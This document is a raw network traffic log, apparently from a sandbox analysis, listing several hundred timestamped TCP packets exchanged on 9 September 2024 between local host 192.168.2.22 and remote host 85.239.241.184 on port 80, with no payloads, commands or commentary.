                                        Sep 9, 2024 17:34:42.191318035 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.191426992 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191437006 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191447020 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191489935 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.191660881 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191670895 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191680908 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191689968 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191700935 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191724062 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.191742897 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.191847086 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191859007 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191869020 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191878080 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191931009 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.191956043 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.192027092 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192044973 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192081928 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192128897 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.192224979 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192234993 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192245007 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192255020 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192265034 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192266941 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.192276001 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192291975 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.192310095 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.192553043 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192564011 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192573071 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192583084 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192593098 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192601919 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192605972 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.192612886 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192625046 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.192650080 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.192713976 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192723989 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192733049 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192754984 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.193080902 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193090916 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193100929 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193109989 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193133116 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.193273067 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193284035 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193293095 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193303108 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193335056 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.193341970 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.193439007 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193450928 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193459988 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193470001 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193480015 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193484068 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.193490028 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193501949 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193512917 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193516016 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.193535089 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.193578005 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193619013 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.193747044 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193758011 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193767071 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193777084 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193788052 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193788052 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.193809032 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.195745945 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.195758104 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.195766926 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.195816040 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.195837975 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.195849895 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.195858002 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.195868969 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.195878029 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.195904016 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196059942 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196070910 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196079969 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196090937 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196099997 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196104050 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196110964 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196120977 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196125984 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196134090 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196139097 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196144104 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196172953 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196180105 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196183920 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196194887 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196208954 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196218014 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196239948 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196311951 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196321964 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196331978 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196350098 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196382046 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196393013 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196433067 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196440935 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196456909 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196469069 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196480036 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196502924 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196531057 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196541071 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196549892 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196563959 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196573019 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196600914 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.266669989 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.266685963 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.266802073 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.277379036 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277412891 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277422905 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277476072 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.277559996 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277570963 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277623892 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.277725935 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277738094 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277748108 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277759075 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277782917 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.277789116 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277792931 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.277962923 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277973890 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277985096 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277993917 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278000116 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278003931 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278017998 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278040886 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278129101 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278139114 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278147936 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278158903 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278170109 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278181076 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278183937 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278203964 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278260946 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278307915 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278474092 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278485060 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278493881 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278503895 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278512955 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278515100 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278522968 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278533936 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278543949 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278553963 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278554916 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278574944 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278796911 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278805971 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278816938 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278825998 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278836012 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278837919 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278846979 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278860092 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278876066 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278979063 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278990984 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279000044 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279011011 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279021978 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.279021978 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279032946 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279042959 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279043913 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.279063940 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.279277086 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279289007 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279325962 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.279454947 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279465914 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279474974 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279484987 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279495955 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279500008 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.279505968 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279515982 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279516935 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.279526949 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279536009 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279539108 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.279550076 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279556990 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.279589891 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.279746056 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279757023 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279794931 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.283440113 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283448935 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283458948 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283468962 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283478975 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283518076 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.283518076 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.283601999 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283617020 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283627033 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283638000 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283647060 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283649921 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.283669949 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.283766985 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283776999 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283786058 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283797979 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283802032 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.283807993 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283833027 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.283948898 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283960104 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283968925 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283977985 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283986092 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283998013 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.284024000 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.284142971 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284152985 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284162045 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284176111 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284185886 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284189939 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.284195900 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284207106 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284216881 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284220934 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.284236908 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.284286022 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284302950 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284312963 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284322977 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284342051 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.284362078 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.284483910 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284493923 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284502983 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284512043 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284522057 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284532070 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284535885 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.284543037 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284553051 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284557104 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.284563065 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284573078 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284574032 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.284583092 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284596920 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.284617901 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.284652948 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284665108 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284707069 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.284822941 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284832954 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284842014 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284864902 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.284969091 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284979105 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.285012960 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.354970932 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.355000019 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.355011940 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.355041981 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.355051994 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.355062008 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.355067968 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.355073929 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.355098009 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.355098009 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.364351988 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.364363909 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.364373922 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.364445925 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.364474058 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.364523888 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.364592075 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.364603043 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.364613056 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.364624023 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.364634037 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.364634991 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.364645004 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.364660978 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.364682913 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.364722013 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.364732027 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.364741087 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.364751101 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.364768982 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.364795923 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.364839077 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.364849091 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.364857912 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.364867926 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.364886999 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.364905119 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.364959955 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.364969969 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.365008116 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.365017891 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.365029097 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.365039110 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.365048885 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.365053892 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.365067005 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.365092039 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.365271091 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.365281105 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.365289927 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.365299940 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.365309954 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.365312099 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.365319967 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.365330935 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.365334034 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.365351915 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.365387917 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.365397930 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.365438938 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.365586042 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.365596056 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.365603924 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.365613937 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.365629911 CEST4917180192.168.2.2285.239.241.184
